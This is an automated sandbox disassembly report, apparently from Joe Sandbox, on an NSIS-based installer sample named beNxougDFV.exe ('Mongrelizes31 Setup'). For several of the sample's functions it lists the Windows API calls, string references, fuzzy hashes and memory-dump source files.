Opcode Fuzzy Hash: feecafc40baf01a00ddfc5a4ad2d6f47f6ba1c3b7388df2095feb28ad013f924
Instruction Fuzzy Hash: 4E61A4B1A40205BFDB109F61CD45F6A7B69FB84704F00803AFB05BA2D1C7B8A951CF99

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction ID: d756f8073455ec7f94eaaa006bac723f94b68f9cc4de0a6a70f3062e944f429a
Opcode Fuzzy Hash: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction Fuzzy Hash: 6E419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Function 00405B9E Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D2F,?,?), ref: 00405BCF
GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405BD8

Part of subcall function 00405A2D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A3D
Part of subcall function 00405A2D: lstrlenA.KERNEL32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A6F

GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405BF5
wsprintfA.USER32 ref: 00405C13
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405C4E
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C5D
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C95
SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEB
GlobalFree.KERNEL32(00000000), ref: 00405CFC
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D03

Part of subcall function 00405AC8: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00405ACC
Part of subcall function 00405AC8: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE

Strings

[Rename], xrefs: 00405C7D, 00405C8F
%s=%s, xrefs: 00405C09

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: fa16ef9a339b69213ae22a03f48f65898cca3967a232a53d2c4426af25c81478
Instruction ID: 318577f01edad599db78de103440226658cd26d488467381f1a5ad924793321f
Opcode Fuzzy Hash: fa16ef9a339b69213ae22a03f48f65898cca3967a232a53d2c4426af25c81478
Instruction Fuzzy Hash: DC311331605B196BD2206B65AC49F6B3A6CDF45754F14053BFA01F72D2E63CAC018EBD

Function 00406199 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\beNxougDFV.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004061F1
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004061FE
CharNextA.USER32(?,"C:\Users\user\Desktop\beNxougDFV.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406203
CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406213

Strings

*?|<>/":, xrefs: 004061E1
C:\Users\user\AppData\Local\Temp\, xrefs: 0040619A
"C:\Users\user\Desktop\beNxougDFV.exe", xrefs: 004061D5

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\beNxougDFV.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2565611603
Opcode ID: cc2015c7b969e01208aad92a9e3b8c758494e26085fc8624e700c096258e22ae
Instruction ID: ca9b47fb282156c43c251839f6001ffd27a0cb8481c2ab4f175210ee2844123a
Opcode Fuzzy Hash: cc2015c7b969e01208aad92a9e3b8c758494e26085fc8624e700c096258e22ae
Instruction Fuzzy Hash: 0911046180839169FB3216244C44B7B7F898F5B760F1A44BFE8D6722C3C67C5C62866E

Function 00404057 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404074
GetSysColor.USER32(00000000), ref: 00404090
SetTextColor.GDI32(?,00000000), ref: 0040409C
SetBkMode.GDI32(?,?), ref: 004040A8
GetSysColor.USER32(?), ref: 004040BB
SetBkColor.GDI32(?,?), ref: 004040CB
DeleteObject.GDI32(?), ref: 004040E5
CreateBrushIndirect.GDI32(?), ref: 004040EF

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: becbdb48d67c78dbb8c9c091cdbe424430cb8bef044b76b3398d9101d9dbd489
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: 86215071904704ABCB219F68DD48B4BBBF8AF41714B048A29EA96B26E0C734E904CB65

Function 00404921 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040493C
GetMessagePos.USER32 ref: 00404944
ScreenToClient.USER32(?,?), ref: 0040495E
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404970
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404996

Strings

f, xrefs: 00404972

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 39a8229da7402e88b879503ea9069683dc6a956defdeaab739565ccd09fe5115
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: F3014071D00219BADB01DBA4DC85FFFBBBCAF55711F10412BBA11B61C0D7B869058BA5

Function 00402C61 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
MulDiv.KERNEL32(0008064E,00000064,00080652), ref: 00402CA7
wsprintfA.USER32 ref: 00402CB7
SetWindowTextA.USER32(?,?), ref: 00402CC7
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9

Strings

verifying installer: %d%%, xrefs: 00402CB1

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 8cc8d962d8a99aef7830ba12bdb56859a6c3448b551b59a443d52a8a404c13af
Instruction ID: 60d807589532a1750165d7633efe1ba379d0dd74474c58c1bab17da8cefdfa8e
Opcode Fuzzy Hash: 8cc8d962d8a99aef7830ba12bdb56859a6c3448b551b59a443d52a8a404c13af
Instruction Fuzzy Hash: DA011271944209FBEF209F60DD09EEE37A9EB04304F008039FA06B92D0D7B99995CF59

Function 00404817 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Mongrelizes31 Setup: Completed,Mongrelizes31 Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404732,000000DF,00000000,00000400,?), ref: 004048B5
wsprintfA.USER32 ref: 004048BD
SetDlgItemTextA.USER32(?,Mongrelizes31 Setup: Completed), ref: 004048D0

Strings

%u.%u%s%s, xrefs: 0040489F
Mongrelizes31 Setup: Completed, xrefs: 004048A7, 004048AC, 004048B2, 004048C6

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Mongrelizes31 Setup: Completed
API String ID: 3540041739-326024652
Opcode ID: fa3760b7cc8f97072af816aff5d6cd3f5b0d901f8ded19e577a8610c70623aa0
Instruction ID: e2544e14f383b0e553931f5ad3d2c5e69aaccc6a02b7144a1c376111f1efcf8d
Opcode Fuzzy Hash: fa3760b7cc8f97072af816aff5d6cd3f5b0d901f8ded19e577a8610c70623aa0
Instruction Fuzzy Hash: 2B11E473A041283BDB0076699C42EAF3288DB81374F254637FB65F21D1E979DC1286A8

Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D98
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
ReleaseDC.USER32(?,00000000), ref: 00401DCB
CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 34073e52274d0eea5c5fbf1d3db0759766414d75607053c18096eba5d79a5540
Instruction ID: 962fd9b87f23d05f09829d6e62e81eb88b122f60c97e2af10dcf53a19e6500d2
Opcode Fuzzy Hash: 34073e52274d0eea5c5fbf1d3db0759766414d75607053c18096eba5d79a5540
Instruction Fuzzy Hash: B0015272948340AFE7006BB0AE49F997FF4A715305F108479F241B62E2C67954569F3E

Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D3F
GetClientRect.USER32(00000000,?), ref: 00401D4C
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
DeleteObject.GDI32(00000000), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 764c70fbd70d8432b47cb810857664527778e1a3b62db9879bd3831654477798
Instruction ID: e514ae104980ccf078864521baf36738fde3649283c018ed360e76dc3c34fc32
Opcode Fuzzy Hash: 764c70fbd70d8432b47cb810857664527778e1a3b62db9879bd3831654477798
Instruction Fuzzy Hash: 13F0FFB2A04115BFDB01EBA4DD88DAFBBBCEB44301B044476F605F2191C6749D018B79

Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C

Strings

!, xrefs: 00401C40

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 756893ed4847bb0bd72a5117efa2a57ba430928b3e2712cee879890b773371fc
Instruction ID: 91203bd525acade81736f390ad8a27fd027b74ba1091a33c19100adfebe27d64
Opcode Fuzzy Hash: 756893ed4847bb0bd72a5117efa2a57ba430928b3e2712cee879890b773371fc
Instruction Fuzzy Hash: 6C218E71E44209BEEB159FA5D946AAD7BB0EB84304F14803EF505F61D1DA788A408F28

Function 004059B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C

Part of subcall function 00405960: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405973
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405987

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw599B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A08
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 00405A18

Strings

C:\Users\user\AppData\Local\Temp\nsw599B.tmp, xrefs: 004059BB, 004059C0, 004059C6, 00405A01, 00405A07, 00405A0F, 00405A17
C:\Users\user\AppData\Local\Temp\, xrefs: 004059B5

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsw599B.tmp
API String ID: 3248276644-3945901156
Opcode ID: 1798501a893aa51cf33724b967df125bb5b79cc73e901e6a487cbcc52799f4ac
Instruction ID: 1994e1ad2c5e9883225bba15f0e05bd5e2410f9dbe362fa4db8952c1f9a8588a
Opcode Fuzzy Hash: 1798501a893aa51cf33724b967df125bb5b79cc73e901e6a487cbcc52799f4ac
Instruction Fuzzy Hash: B3F04CB6205D5296C622333A1C066EF2A55CE86334719463FF891B13D2DB3C8913DD7E

Function 004058C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031A8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004058CD
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031A8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004058D6
lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 004058E7

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004058C7

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-2145255484
Opcode ID: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
Instruction ID: 8ecb161afe92f8f98ec5c140421c9a6f3833b5d00e23c8f539a5f8bbe46d8a58
Opcode Fuzzy Hash: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
Instruction Fuzzy Hash: B0D0A962A05D302BD20273159C05E8F2A0CCF12740B0400B2F200B22E2C63C4D428FFE

Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
RegCloseKey.ADVAPI32(?), ref: 00402C22
RegCloseKey.ADVAPI32(?), ref: 00402C43

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
